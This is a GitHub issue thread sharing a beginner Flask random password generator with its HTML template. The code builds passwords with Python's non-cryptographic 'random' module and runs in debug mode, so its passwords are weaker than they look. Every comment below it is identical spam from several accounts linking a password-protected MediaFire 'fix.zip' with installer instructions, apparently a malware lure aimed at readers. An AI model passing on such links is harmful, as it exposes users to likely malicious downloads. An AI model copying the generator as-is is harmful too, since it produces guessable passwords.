### ISSUE TITLE
Random password Generator

### ISSUE THREAD

**Issue by Gopi8686603** [Gopi8686603/Gopinth#5]
# Random Password Generator Flask App

from flask import Flask,request,render_template
from datetime import date
import random
import string

#### Defining Flask App
app = Flask(__name__)

#### Saving Date today in 2 different formats
datetoday = date.today().strftime("%m_%d_%y")
datetoday2 = date.today().strftime("%d-%B-%Y")

#### Our main page
@app.route('/')
def home():
    return render_template('home.html',datetoday2=datetoday2)

@app.route('/genpassword',methods=['GET','POST'])
def genpassword():
    minpasslen = 8
    maxpasslen = 30

    passlen = int(request.form.get('passlen'))

    if passlen<minpasslen:
        return render_template('home.html',datetoday2=datetoday2,mess=f'Atleast create a {minpasslen} digit password...')

    if passlen>maxpasslen:
        return render_template('home.html',datetoday2=datetoday2,mess=f'Can Create a max {maxpasslen} digit password...')

    include_spaces = request.form.get('includespaces')
    include_numbers = request.form.get('includenumbers')
    include_special_chars = request.form.get('includespecialchars')
    include_uppercase_letters= request.form.get('includeuppercaseletters')
    
    lowercase_letters = string.ascii_lowercase
    uppercase_letters = string.ascii_uppercase
    digits = string.digits
    special_chars = string.punctuation

    print(include_spaces,include_numbers,include_special_chars,include_uppercase_letters)

    char_sets = [lowercase_letters]

    # Add character sets based on the parameters
    if include_spaces=='on':
        char_sets.append(' ')
    if include_numbers=='on':
        char_sets.append(digits)
    if include_special_chars=='on':
        char_sets.append(special_chars)
    if include_uppercase_letters=='on':
        char_sets.append(uppercase_letters)

    # Combine the character sets
    all_chars = ''.join(char_sets)

    password = random.choices(all_chars, k=passlen)
    password = ''.join(password)

    return render_template('home.html',datetoday2=datetoday2,generatedpassword=password)

#### Our main function which runs the Random Password Generator Flask App
if __name__ == '__main__':
    app.run(debug=True)

Frontend HTML code

<!doctype html>
<html lang="en">

<style type='text/css'>
    * {
        padding: 0;
        margin: 0;
        font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
    }

    body {
        background-image: url('https://cutewallpaper.org/21/1920-x-1080-gif/1920x1080-Wallpapercartoon-Wallpapers-Driverlayer-Search-.gif');
        background-size: cover;
        font-family: sans-serif;
        margin-top: 40px;
        height: 100vh;
        padding: 0;
        margin: 0;
    }

    table {
        border: 1px;
        font-family: arial, sans-serif;
        border-collapse: collapse;
        width: 86%;
        margin: auto;
    }

    td,
    th {
        border: 1px solid black !important;
        padding: 5px;
    }

    tr:nth-child(even) {
        background-color: #dddddd;
    }
</style>

<head>
    
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="https://fonts.googleapis.com/icon?family=Material+Icons">

    
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.0-beta3/dist/css/bootstrap.min.css" rel="stylesheet"
        integrity="sha384-eOJMYsd53ii+scO/bJGFsiCZc+5NDVN2yr8+0RDqr0Ql0h+rP48ckxlpbzKgwra6" crossorigin="anonymous">

    <title>Random Password Generator</title>
</head>

<body>

    <div class='mt-1 text-center'>
        <h1 style="width: auto;margin: auto;color: white;padding: 20px;">Random Password Generator</h1>
    </div>

    <div class='mt-3 text-center'>
        <h3 style="font-size: 22px;color:beige;">{{ datetoday2 }} | <span id="clock"></span></h3>
    </div>

    {% if mess%}
    <p class="text-center" style="color: red;font-size: 20px;">{{ mess }}</p>
    {% endif %}

    <div class="row text-center" style="padding: 20px;margin: 20px;">

        <div class="col"
            style="border-radius: 20px;padding: 0px;background-color:rgb(211,211,211,0.5);margin:0px 10px 10px 10px;min-height: 400px;">
            <h2 style="border-radius: 20px 20px 0px 0px;background-color: #0b4c61;color: white;padding: 10px;">Random
                password Generator </h2>

            <form action='/genpassword' method="POST" enctype="multipart/form-data">
                <label style="font-size: 20px;"><b>Enter Password Length*</b></label>
                <br>
                <input type="text" id="passlen" name='passlen'
                    style="font-size: 20px;margin-top:10px;margin-bottom:10px;" required>
                <br>
                <div class="container" style="width: 270px;text-align: left;">
                    <div class="form-check">
                        <input class="form-check-input" type="checkbox" name="includespaces" id="includespaces" checked>
                        <label class="form-check-label" for="flexCheckChecked">Include Spaces</label>
                    </div>

                    <div class="form-check">
                        <input class="form-check-input" type="checkbox" name="includenumbers" id="includenumbers"
                            checked>
                        <label class="form-check-label" for="flexCheckChecked">Include Numbers</label>
                    </div>

                    <div class="form-check">
                        <input class="form-check-input" type="checkbox" name="includespecialchars"
                            id="includespecialchars" checked>
                        <label class="form-check-label" for="flexCheckChecked">Include Symbols</label>
                    </div>

                    <div class="form-check">
                        <input class="form-check-input" type="checkbox" name="includeuppercaseletters"
                            id="includeuppercaseletters" checked>
                        <label class="form-check-label" for="flexCheckChecked">Include UpperCase Letters</label>
                    </div>
                </div>
                <button style="width: 232px;margin-top: 20px;font-size: 20px;" type='submit'
                    class='btn btn-success'>Generate Password
                </button>
                <br>
            </form>

            {% if generatedpassword %}
            <div>
                <h3 class="text-center" style="font-size: 25px;">Generated Password:</h3>
                <h4 class="text-center" style="font-size: 25px;"><b>{{ generatedpassword }}</b></h4>
            </div>
            {% endif %}

        </div>
        

    </div>

    <script type="text/javascript">
        var clockElement = document.getElementById('clock');

        function clock() {
            clockElement.textContent = new Date().toString().slice(15, 24);
        }

        setInterval(clock, 1000);
    </script>

</body>

</html>

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by TerminatedGA** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by abdulhkeemGit** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by TerminatedGA** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
